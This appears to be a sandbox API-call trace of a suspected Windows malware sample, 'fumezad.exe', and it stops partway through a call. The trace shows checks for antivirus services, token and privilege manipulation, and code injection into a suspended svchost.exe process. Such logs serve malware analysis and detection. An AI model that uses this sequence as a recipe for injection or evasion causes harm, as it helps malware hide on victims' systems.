0x2ca438*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca4b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca538*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca5b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca638*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca6b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.538] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca738*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.538] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.538] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca7b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.538] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.538] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca838*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.538] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.538] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca8b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.538] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.538] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca938*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.538] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.538] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca9b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.538] GetStartupInfoW (in: lpStartupInfo=0x428b8a | out: lpStartupInfo=0x428b8a*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0220.538] GetSystemDirectoryW (in: lpBuffer=0x18b018, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0220.539] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x2c1eb0 [0220.541] OpenServiceW (hSCManager=0x2c1eb0, lpServiceName="WinDefend", dwDesiredAccess=0x4) returned 0x0 [0220.541] CloseServiceHandle (hSCObject=0x2c1eb0) returned 1 [0220.566] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x2c1eb0 [0220.566] OpenServiceW (hSCManager=0x2c1eb0, lpServiceName="MBAMService", dwDesiredAccess=0x4) returned 0x0 [0220.566] CloseServiceHandle (hSCObject=0x2c1eb0) returned 1 [0220.566] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x2c1eb0 [0220.567] OpenServiceW (hSCManager=0x2c1eb0, lpServiceName="SAVService", dwDesiredAccess=0x4) returned 0x0 [0220.567] CloseServiceHandle (hSCObject=0x2c1eb0) returned 1 [0220.567] GetNativeSystemInfo (in: lpSystemInfo=0x18b204 | out: lpSystemInfo=0x18b204*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0220.567] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18ad90, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe")) returned 0x36 [0220.567] GetCurrentProcess () returned 0xffffffff [0220.567] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18a904 | out: TokenHandle=0x18a904*=0xd0) returned 1 [0220.567] GetTokenInformation (in: TokenHandle=0xd0, TokenInformationClass=0x1, TokenInformation=0x18a908, TokenInformationLength=0x4c, ReturnLength=0x18a8f0 | out: TokenInformation=0x18a908, ReturnLength=0x18a8f0) returned 1 [0220.567] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18a8fc, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18a8f8 | out: pSid=0x18a8f8*=0x2c06e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0220.567] EqualSid (pSid1=0x18a910*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), pSid2=0x2c06e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0220.567] CloseHandle (hObject=0xd0) returned 1 [0220.567] GetCurrentProcess () returned 0xffffffff [0220.567] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x18a948 | out: TokenHandle=0x18a948*=0xd0) returned 1 [0220.567] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x18a908 | out: lpLuid=0x18a908*(LowPart=0x7, HighPart=0)) returned 1 [0220.568] AdjustTokenPrivileges (in: TokenHandle=0xd0, DisableAllPrivileges=0, NewState=0x18a904*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x18a914, ReturnLength=0x18a950 | out: PreviousState=0x18a914, ReturnLength=0x18a950) returned 1 [0220.568] WTSEnumerateSessionsW (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0x18a93c, pCount=0x18a944 | out: ppSessionInfo=0x18a93c, pCount=0x18a944) returned 1 [0222.124] WTSFreeMemory (pMemory=0x2d08d8) [0222.124] RevertToSelf () returned 1 [0222.124] WTSQueryUserToken (SessionId=0x1, phToken=0x18a900*=0xffffffff) returned 1 [0222.125] DuplicateTokenEx (in: hExistingToken=0xe8, dwDesiredAccess=0x2000000, lpTokenAttributes=0x0, ImpersonationLevel=0x1, TokenType=0x1, phNewToken=0x18a940 | out: phNewToken=0x18a940*=0xec) returned 1 [0222.125] CloseHandle (hObject=0xe8) returned 1 [0222.125] AdjustTokenPrivileges (in: TokenHandle=0xd0, DisableAllPrivileges=0, NewState=0x18a914, BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0222.125] CloseHandle (hObject=0xd0) returned 1 [0222.125] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0xec, dwFlags=0x0, pszPath=0x18a978 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0222.139] CloseHandle (hObject=0xec) returned 1 [0222.139] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0 [0222.139] VirtualAlloc (lpAddress=0x0, dwSize=0x1d400, flAllocationType=0x3000, flProtect=0x40) returned 0x280000 [0222.141] VirtualAlloc (lpAddress=0x0, dwSize=0x352e, flAllocationType=0x3000, flProtect=0x40) returned 0x2a0000 [0222.142] VirtualAlloc (lpAddress=0x10000000, dwSize=0x7000, flAllocationType=0x2000, flProtect=0x40) returned 0x10000000 [0222.142] VirtualAlloc (lpAddress=0x10000000, dwSize=0x268, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000 [0222.142] VirtualProtect (in: lpAddress=0x10000000, dwSize=0x268, flNewProtect=0x2, lpflOldProtect=0x18a940 | out: lpflOldProtect=0x18a940*=0x4) returned 1 [0222.142] VirtualAlloc (lpAddress=0x10001000, dwSize=0x2b8a, flAllocationType=0x1000, flProtect=0x40) returned 0x10001000 [0222.142] VirtualAlloc (lpAddress=0x10004000, dwSize=0x444, flAllocationType=0x1000, flProtect=0x40) returned 0x10004000 [0222.142] VirtualAlloc (lpAddress=0x10005000, dwSize=0x78, flAllocationType=0x1000, flProtect=0x40) returned 0x10005000 [0222.143] VirtualAlloc (lpAddress=0x10006000, dwSize=0x1f8, flAllocationType=0x1000, flProtect=0x40) returned 0x10006000 [0222.143] VirtualProtect (in: lpAddress=0x10001000, dwSize=0x2b8a, flNewProtect=0x20, lpflOldProtect=0x18a940 | out: lpflOldProtect=0x18a940*=0x40) returned 1 [0222.143] VirtualProtect (in: lpAddress=0x10004000, dwSize=0x444, flNewProtect=0x2, lpflOldProtect=0x18a940 | out: lpflOldProtect=0x18a940*=0x40) returned 1 [0222.143] VirtualProtect (in: lpAddress=0x10005000, dwSize=0x78, flNewProtect=0x4, lpflOldProtect=0x18a940 | out: lpflOldProtect=0x18a940*=0x40) returned 1 [0222.143] VirtualProtect (in: lpAddress=0x10006000, dwSize=0x1f8, flNewProtect=0x2, lpflOldProtect=0x18a940 | out: lpflOldProtect=0x18a940*=0x40) returned 1 [0222.143] VirtualAlloc (lpAddress=0x0, dwSize=0x1f, flAllocationType=0x3000, flProtect=0x40) returned 0x3b0000 [0222.143] Wow64DisableWow64FsRedirection (in: OldValue=0x18a508 | out: OldValue=0x18a508*=0x0) returned 1 [0222.143] GetSystemDirectoryW (in: lpBuffer=0x18a510, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0222.143] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x428b8a*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18a720 | out: lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessInformation=0x18a720*(hProcess=0xfc, hThread=0xec, dwProcessId=0x55c, dwThreadId=0x358)) returned 1 [0222.148] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x3c0000 [0222.149] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32.dll", BaseAddress=0x18a8b8 | out: BaseAddress=0x18a8b8*=0x0) returned 0xc0000018 [0222.149] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernelbase.dll", BaseAddress=0x18a8c0 | out: BaseAddress=0x18a8c0*=0xcb0000) returned 0x0 [0222.153] NtCreateEvent (in: EventHandle=0x18a8f8, DesiredAccess=0x1f0003, ObjectAttributes=0x0, EventType=0x1, InitialState=0 | out: EventHandle=0x18a8f8*=0x11c) returned 0x0 [0222.153] NtCreateEvent (in: EventHandle=0x18a900, DesiredAccess=0x1f0003, ObjectAttributes=0x0, EventType=0x1, InitialState=0 | out: EventHandle=0x18a900*=0x118) returned 0x0 [0222.153] NtDuplicateObject (in: SourceProcessHandle=0xffffffffffffffff, SourceHandle=0x11c, TargetProcessHandle=0xfc, TargetHandle=0x18a818, DesiredAccess=0x1f0000, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18a818*=0x4) returned 0x0 [0222.153] NtDuplicateObject (in: SourceProcessHandle=0xffffffffffffffff, SourceHandle=0x118, TargetProcessHandle=0xfc, TargetHandle=0x18a820, DesiredAccess=0x1f0000, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18a820*=0x8) returned 0x0 [0222.153] NtAllocateVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a7b8*=0x0, ZeroBits=0x0, RegionSize=0x18a768*=0x220, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a7b8*=0x50000, RegionSize=0x18a768*=0x1000) returned 0x0 [0222.154] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x50000, Buffer=0x10003850*, NumberOfBytesToWrite=0x220, NumberOfBytesWritten=0x18a7c0 | out: Buffer=0x10003850*, NumberOfBytesWritten=0x18a7c0*=0x220) returned 0x0 [0222.154] NtAllocateVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a7b8*=0x0, ZeroBits=0x0, RegionSize=0x18a768*=0x48, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a7b8*=0x60000, RegionSize=0x18a768*=0x1000) returned 0x0 [0222.154] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x60000, Buffer=0x18a818*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x18a7c0 | out: Buffer=0x18a818*, NumberOfBytesWritten=0x18a7c0*=0x48) returned 0x0 [0222.155] NtQueryInformationProcess (in: ProcessHandle=0xfc, ProcessInformationClass=0x0, ProcessInformation=0x18a338, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x18a338, ReturnLength=0x0) returned 0x0 [0222.155] NtReadVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x7fffffd3000, Buffer=0x18a4b8, NumberOfBytesToRead=0x2c8, NumberOfBytesRead=0x18a7b0 | out: Buffer=0x18a4b8*, NumberOfBytesRead=0x18a7b0*=0x2c8) returned 0x0 [0222.155] NtReadVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0xffaa0000, Buffer=0x18a368, NumberOfBytesToRead=0x40, NumberOfBytesRead=0x18a7b8 | out: Buffer=0x18a368*, NumberOfBytesRead=0x18a7b8*=0x40) returned 0x0 [0222.155] NtReadVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0xffaa00e8, Buffer=0x18a3a8, NumberOfBytesToRead=0x108, NumberOfBytesRead=0x18a7c0 | out: Buffer=0x18a3a8*, NumberOfBytesRead=0x18a7c0*=0x108) returned 0x0 [0222.155] NtProtectVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a788*=0xffaa246c, NumberOfBytesToProtect=0x18a7b8, NewAccessProtection=0x40, OldAccessProtection=0x18a7b0 | out: BaseAddress=0x18a788*=0xffaa2000, NumberOfBytesToProtect=0x18a7b8, OldAccessProtection=0x18a7b0*=0x20) returned 0x0 [0222.155] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0xffaa246c, Buffer=0x18a7e8*, NumberOfBytesToWrite=0x16, NumberOfBytesWritten=0x18a8c0 | out: Buffer=0x18a7e8*, NumberOfBytesWritten=0x18a8c0*=0x16) returned 0x0 [0222.155] NtClearEvent (EventHandle=0x118) returned 0x0 [0222.155] NtClearEvent (EventHandle=0x11c) returned 0x0 [0222.155] NtResumeThread (in: ThreadHandle=0xec, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0222.155] NtSignalAndWaitForSingleObject (SignalObject=0x118, WaitObject=0x11c, Alertable=0, Time=0x0) returned 0x0 [0222.171] NtAllocateVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a6f0*=0x10000000, ZeroBits=0x0, RegionSize=0x18a708*=0x20000, AllocationType=0x2000, Protect=0x40 | out: BaseAddress=0x18a6f0*=0x10000000, RegionSize=0x18a708*=0x20000) returned 0x0 [0222.172] NtAllocateVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a700*=0x10000000, ZeroBits=0x0, RegionSize=0x18a788*=0x400, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x18a700*=0x10000000, RegionSize=0x18a788*=0x1000) returned 0x0 [0222.172] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x10000000, Buffer=0x280000*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x18a680 | out: Buffer=0x280000*, NumberOfBytesWritten=0x18a680*=0x400) returned 0x0 [0222.172] NtProtectVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a720*=0x10000000, NumberOfBytesToProtect=0x18a760, NewAccessProtection=0x2, OldAccessProtection=0x18a8c8 | out: BaseAddress=0x18a720*=0x10000000, NumberOfBytesToProtect=0x18a760, OldAccessProtection=0x18a8c8*=0x4) returned 0x0 [0222.172] NtAllocateVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a6c0*=0x10001000, ZeroBits=0x0, RegionSize=0x18a798*=0x19800, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x18a6c0*=0x10001000, RegionSize=0x18a798*=0x1a000) returned 0x0 [0222.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a690*=0x0, ZeroBits=0x0, RegionSize=0x18a730*=0x19800, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a690*=0x3d0000, RegionSize=0x18a730*=0x1a000) returned 0x0 [0222.174] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x10001000, Buffer=0x3d0000*, NumberOfBytesToWrite=0x19800, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x3d0000*, NumberOfBytesWritten=0x18a5f8*=0x19800) returned 0x0 [0222.175] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a740*=0x3d0000, RegionSize=0x18a770, FreeType=0x8000) returned 0x0 [0222.175] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x10001000, Buffer=0x280400*, NumberOfBytesToWrite=0x19800, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x280400*, NumberOfBytesWritten=0x18a5f8*=0x19800) returned 0x0 [0222.176] NtAllocateVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a6c0*=0x1001b000, ZeroBits=0x0, RegionSize=0x18a798*=0x2400, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x18a6c0*=0x1001b000, RegionSize=0x18a798*=0x3000) returned 0x0 [0222.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a690*=0x0, ZeroBits=0x0, RegionSize=0x18a730*=0x2400, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a690*=0x3d0000, RegionSize=0x18a730*=0x3000) returned 0x0 [0222.176] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x1001b000, Buffer=0x3d0000*, NumberOfBytesToWrite=0x2400, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x3d0000*, NumberOfBytesWritten=0x18a5f8*=0x2400) returned 0x0 [0222.176] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a740*=0x3d0000, RegionSize=0x18a770, FreeType=0x8000) returned 0x0 [0222.176] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x1001b000, Buffer=0x299c00*, NumberOfBytesToWrite=0x2400, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x299c00*, NumberOfBytesWritten=0x18a5f8*=0x2400) returned 0x0 [0222.177] NtAllocateVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a6c0*=0x1001e000, ZeroBits=0x0, RegionSize=0x18a798*=0x200, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x18a6c0*=0x1001e000, RegionSize=0x18a798*=0x1000) returned 0x0 [0222.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a690*=0x0, ZeroBits=0x0, RegionSize=0x18a730*=0x200, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a690*=0x3d0000, RegionSize=0x18a730*=0x1000) returned 0x0 [0222.177] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x1001e000, Buffer=0x3d0000*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x3d0000*, NumberOfBytesWritten=0x18a5f8*=0x200) returned 0x0 [0222.177] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a740*=0x3d0000, RegionSize=0x18a770, FreeType=0x8000) returned 0x0 [0222.177] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x1001e000, Buffer=0x29c000*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x29c000*, NumberOfBytesWritten=0x18a5f8*=0x200) returned 0x0 [0222.177] NtAllocateVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a6c0*=0x1001f000, ZeroBits=0x0, RegionSize=0x18a798*=0x200, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x18a6c0*=0x1001f000, RegionSize=0x18a798*=0x1000) returned 0x0 [0222.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a690*=0x0, ZeroBits=0x0, RegionSize=0x18a730*=0x200, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a690*=0x3d0000, RegionSize=0x18a730*=0x1000) returned 0x0 [0222.178] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x1001f000, Buffer=0x3d0000*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x3d0000*, NumberOfBytesWritten=0x18a5f8*=0x200) returned 0x0 [0222.178] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a740*=0x3d0000, RegionSize=0x18a770, FreeType=0x8000) returned 0x0 [0222.178] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x1001f000, Buffer=0x29c200*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x29c200*, NumberOfBytesWritten=0x18a5f8*=0x200) returned 0x0 [0222.178] NtProtectVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a710*=0x10001000, NumberOfBytesToProtect=0x18a780, NewAccessProtection=0x20, OldAccessProtection=0x18a8d0 | out: BaseAddress=0x18a710*=0x10001000, NumberOfBytesToProtect=0x18a780, OldAccessProtection=0x18a8d0*=0x4) returned 0x0 [0222.178] NtProtectVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a710*=0x1001b000, NumberOfBytesToProtect=0x18a780, NewAccessProtection=0x4, OldAccessProtection=0x18a8d0 | out: BaseAddress=0x18a710*=0x1001b000, NumberOfBytesToProtect=0x18a780, OldAccessProtection=0x18a8d0*=0x4) returned 0x0 [0222.178] NtProtectVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a710*=0x1001e000, NumberOfBytesToProtect=0x18a780, NewAccessProtection=0x2, OldAccessProtection=0x18a8d0 | out: BaseAddress=0x18a710*=0x1001e000, NumberOfBytesToProtect=0x18a780, OldAccessProtection=0x18a8d0*=0x4) returned 0x0 [0222.178] NtProtectVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a710*=0x1001f000, NumberOfBytesToProtect=0x18a780, NewAccessProtection=0x2, OldAccessProtection=0x18a8d0 | out: BaseAddress=0x18a710*=0x1001f000, NumberOfBytesToProtect=0x18a780, OldAccessProtection=0x18a8d0*=0x4) returned 0x0 [0222.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a6f8*=0x0, ZeroBits=0x0, RegionSize=0x18a748*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a6f8*=0x3d0000, RegionSize=0x18a748*=0x1000) returned 0x0 [0222.179] NtQueryInformationProcess (in: ProcessHandle=0xfc, ProcessInformationClass=0x0, ProcessInformation=0x3d0000, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x3d0000, ReturnLength=0x0) returned 0x0 [0222.179] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x7fffffd3010, Buffer=0x18a648*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x18a678 | out: Buffer=0x18a648*, NumberOfBytesWritten=0x18a678*=0x8) returned 0x0 [0222.179] NtReadVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x7fffffd3018, Buffer=0x18a758, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x18a688 | out: Buffer=0x18a758*, NumberOfBytesRead=0x18a688*=0x8) returned 0x0 [0222.179] NtReadVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x77712640, Buffer=0x18a7a0, NumberOfBytesToRead=0x30, NumberOfBytesRead=0x18a698 | out: Buffer=0x18a7a0*, NumberOfBytesRead=0x18a698*=0x30) returned 0x0 [0222.179] NtReadVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x2c2620, Buffer=0x18a7d8, NumberOfBytesToRead=0x88, NumberOfBytesRead=0x18a6a8 | out: Buffer=0x18a7d8*, NumberOfBytesRead=0x18a6a8*=0x88) returned 0x0 [0222.179] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x2c2650, Buffer=0x18a648*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x18a6b8 | out: Buffer=0x18a648*, NumberOfBytesWritten=0x18a6b8*=0x8) returned 0x0 [0222.179] NtAllocateVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a620*=0x0, ZeroBits=0x0, RegionSize=0x18a628*=0x7e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a620*=0x20000, RegionSize=0x18a628*=0x1000) returned 0x0 [0222.179] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x20000, Buffer=0x18a6d0*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x18a6c8 | out: Buffer=0x18a6d0*, NumberOfBytesWritten=0x18a6c8*=0x10) returned 0x0 [0222.179] NtWriteVirtualMemory (in: ProcessHandle=0xfc, 